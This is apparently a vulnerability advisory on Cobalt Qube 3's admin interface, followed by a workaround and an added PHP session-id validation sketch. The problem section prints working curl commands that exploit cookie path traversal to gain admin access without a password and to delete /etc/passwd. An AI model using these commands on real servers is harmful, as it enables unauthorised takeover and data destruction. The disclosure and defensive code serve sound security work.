COMMAND

Cobalt Qube administration page various vulns

SYSTEMS AFFECTED

Cobalt Qube 3 (Cobalt Linux release 6.0 (Carmel) Kernel 2.2.16C7 on i586)

PROBLEM

pokleyzz [pokleyzz@scan-associates.net], sk [sk@scan-associates.net] and shaharil [shaharil@scan-associates.net] of scan-associates [http://www.scan-associates.net] found:

Problem 1: Local Privilege Escalation to Admin

Any user able to create a file in any location on a Cobalt server can promote themselves to Admin access of the System Management interface. The sessionId cookie is used as a file path, so a user can create a file such as /tmp/test and craft a cookie that logs in as Admin without a password.

Create a dummy session file on the Cobalt server:

    $ printf "admin" > /tmp/test

Log in without a password from anywhere:

    $ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin http://192.168.0.1:444/splashAdmin.php

Problem 2: Remote User access

We also found that if the User account is newly created, the authentication can be bypassed without creating a dummy session file on the server:

    $ curl -b sessionId=../codb/objects/4/.name\;loginName=admin http://192.168.0.1:444/splashAdmin.php

Problem 3: Remotely delete file

It is possible to delete a file from the server by specifying the path to the file and the first 31 characters of the file. The following example will delete the /etc/passwd file from the server:

    $ curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php

Note: curl can be downloaded from http://curl.haxx.se/download.html

SOLUTION

Workaround
==========

In /usr/sausalito/ui/libPhp/ServerScriptHelper.php line 64:

    $sessionId = ereg_replace("\.\.","",$sessionId);
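
The workaround strips ".." from the cookie value. The sketch below shows a stricter alternative technique, allowlist validation of the session id followed by a canonical-path containment check. It is an added example, not code from the advisory or from Cobalt. The function name resolveSessionFile, the token format and the session directory are assumptions.

```php
<?php
// Added example, not Cobalt/Sausalito code. The token format (16-64
// alphanumeric characters) and the session directory are assumptions.

/** Return the session file path for $sessionId, or null if it is rejected. */
function resolveSessionFile(string $sessionId, string $baseDir): ?string
{
    // 1. Allowlist: accept only characters a generated token can contain.
    //    This rejects "/", ".", NUL bytes and anything else in one step,
    //    rather than trying to strip known-bad sequences such as "..".
    if (preg_match('/\A[A-Za-z0-9]{16,64}\z/', $sessionId) !== 1) {
        return null;
    }
    // 2. Canonicalise both paths. realpath() resolves symlinks and returns
    //    false when the path does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $sessionId);
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Containment: the resolved file must sit directly under the base.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Demo with a throwaway session directory (hypothetical location).
$dir  = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'sess-demo-' . getmypid();
$good = 'f3a91c0b7d2e4a58b6c1d0e9a7f45b32';   // constructed sample token
mkdir($dir, 0700);
file_put_contents($dir . DIRECTORY_SEPARATOR . $good, 'admin');

// The three cookie values shown in the advisory, plus the sample token.
$samples = [
    '/../../../../../../tmp/test',
    '../codb/objects/4/.name',
    '../../../../../../../../etc/passwd',
    $good,
];
foreach ($samples as $id) {
    $verdict = resolveSessionFile($id, $dir) === null ? 'rejected' : 'accepted';
    printf("%-40s %s\n", $id, $verdict);
}

unlink($dir . DIRECTORY_SEPARATOR . $good);
rmdir($dir);
```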